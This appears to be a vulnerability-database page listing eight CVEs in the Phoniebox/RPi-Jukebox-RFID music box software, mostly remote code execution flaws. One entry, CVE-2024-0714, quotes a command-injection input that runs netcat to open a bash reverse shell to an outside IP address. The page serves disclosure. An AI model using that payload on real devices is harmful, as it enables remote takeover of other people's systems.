Sourcefabric Phoniebox vulnerabilities
8 known vulnerabilities affecting sourcefabric/phoniebox.
Total CVEs: 8
CISA KEV: 0
Public exploits: 0
Exploited in wild: 0
Severity breakdown: CRITICAL 7, HIGH 1
Vulnerabilities
CVE-2024-0714 | P2 | CRITICAL | CVSS 9.8 | CWE-78 | ≤ 2.5.0 | 2024-01-19
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack
nvd
CVE-2024-41367 | P3 | CRITICAL | CVSS 9.8 | CWE-94 | v2.7.0 | 2024-08-29
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\api\playlist\appendFileToPlaylist.php
nvd
CVE-2024-41361 | P3 | CRITICAL | CVSS 9.8 | CWE-94 | v2.7.0 | 2024-08-29
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\manageFilesFolders.php
nvd
CVE-2024-41368 | P3 | CRITICAL | CVSS 9.8 | CWE-94 | v2.7.0 | 2024-08-29
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWlanIpMail.php
nvd
CVE-2024-41366 | P3 | CRITICAL | CVSS 9.8 | CWE-94 | v2.7.0 | 2024-08-29
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\userScripts.php
nvd
CVE-2024-41364 | P3 | CRITICAL | CVSS 9.8 | CWE-94 | v2.7.0 | 2024-08-29
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\trackEdit.php
nvd
CVE-2024-41369 | P3 | CRITICAL | CVSS 9.8 | CWE-94 | v2.7.0 | 2024-08-29
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php
nvd
CVE-2025-63951 | P3 | HIGH | CVSS 7.5 | CWE-502 | ≤ 2025-10-07 | 2025-12-18
An insecure deserialization vulnerability exists in the rss-mp3.php script of the MiczFlor RPi-Jukebox-RFID project through commit 4b2334f0ae0e87c0568876fc41c48c38aa9a7014 (2025-10-07). The 'rss' GET parameter receives data that is passed directly to the unserialize() function without validation. This allows a remote, unauthenticated attacker to injec
nvd